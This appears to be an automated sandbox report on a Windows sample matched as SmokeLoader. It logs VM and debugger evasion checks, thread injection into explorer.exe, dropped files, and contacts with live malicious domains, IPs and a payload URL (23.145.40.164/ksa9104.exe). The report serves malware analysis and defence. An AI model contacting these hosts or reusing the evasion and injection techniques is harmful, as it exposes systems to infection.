Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\vsvrjra:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\ajvrjra:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\vsvrjra	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\vsvrjra	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Local\Temp\A869.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Local\Temp\A869.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\ajvrjra	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\ajvrjra	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: LgigaSKsL6.exe, 00000000.00000002.1816189984.0000000002C3E000.00000004.00000020.00020000.00000000.sdmp, vsvrjra, 00000005.00000002.2075742715.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, A869.exe, 00000007.00000002.2440436895.0000000002C0E000.00000004.00000020.00020000.00000000.sdmp, ajvrjra, 00000009.00000002.2771242999.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Users\user\AppData\Local\Temp\A869.exe

Code function: 7_2_00401E65 rdtsc

7_2_00401E65

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 408	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1015	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 655	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2369	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 883	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 869	Jump to behavior

Source: C:\Windows\explorer.exe TID: 6892	Thread sleep count: 408 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6916	Thread sleep count: 1015 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6916	Thread sleep time: -101500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6908	Thread sleep count: 655 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6908	Thread sleep time: -65500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7052	Thread sleep count: 313 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7124	Thread sleep count: 267 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7076	Thread sleep count: 273 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2032	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2208	Thread sleep count: 102 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1620	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6916	Thread sleep count: 2369 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6916	Thread sleep time: -236900s >= -30000s	Jump to behavior

Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1797051096.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1797051096.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1790387901.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1795949633.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\LgigaSKsL6.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\LgigaSKsL6.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A869.exe

Code function: 7_2_00401E65 rdtsc

7_2_00401E65

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_02C4A133 push dword ptr fs:[00000030h]	0_2_02C4A133
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]	0_2_02FC0D90
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]	0_2_02FC092B
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_02CC0D90 mov eax, dword ptr fs:[00000030h]	5_2_02CC0D90
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_02CC092B mov eax, dword ptr fs:[00000030h]	5_2_02CC092B
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_02D79F1B push dword ptr fs:[00000030h]	5_2_02D79F1B
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA0D90 mov eax, dword ptr fs:[00000030h]	7_2_02BA0D90
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA092B mov eax, dword ptr fs:[00000030h]	7_2_02BA092B
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02C19F60 push dword ptr fs:[00000030h]	7_2_02C19F60
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_02C30D90 mov eax, dword ptr fs:[00000030h]	9_2_02C30D90
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_02C3092B mov eax, dword ptr fs:[00000030h]	9_2_02C3092B
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_02CC9D20 push dword ptr fs:[00000030h]	9_2_02CC9D20

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: ajvrjra.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.220.21.28 80	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Thread created: C:\Windows\explorer.exe EIP: 13A19A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Thread created: unknown EIP: 32E19A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Thread created: unknown EIP: 8EF1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Thread created: unknown EIP: 9071970	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1790038935.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Roaming\vsvrjra

Code function: 10_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

10_2_00404E64

Source: C:\Users\user\Desktop\LgigaSKsL6.exe

Code function: 0_2_00415C20 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,

0_2_00415C20

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	521 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LgigaSKsL6.exe	42%	ReversingLabs	Win32.Trojan.Generic
LgigaSKsL6.exe	40%	Virustotal		Browse
LgigaSKsL6.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\vsvrjra	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A869.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ajvrjra	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vsvrjra	42%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nwgrus.ru	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://aka.ms/odirmr	0%	Virustotal		Browse
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Virustotal		Browse
https://23.145.40.164/ksa9104.exe	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Virustotal		Browse
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
https://ninjahallnews.com/search.php	0%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
https://fallhandbat.com/search.php	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?&	0%	Virustotal		Browse
https://www.rd.com/list/polite-habits-campers-dislike/	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	Virustotal		Browse
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Virustotal		Browse
https://www.msn.com:443/en-us/feed	0%	Virustotal		Browse
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	190.224.203.37	true	true	12%, Virustotal, Browse	unknown
fallhandbat.com	unknown	unknown	true		unknown
ninjahallnews.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://23.145.40.164/ksa9104.exe	true	0%, Virustotal, Browse	unknown
https://ninjahallnews.com/search.php	true	0%, Virustotal, Browse	unknown
https://fallhandbat.com/search.php	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
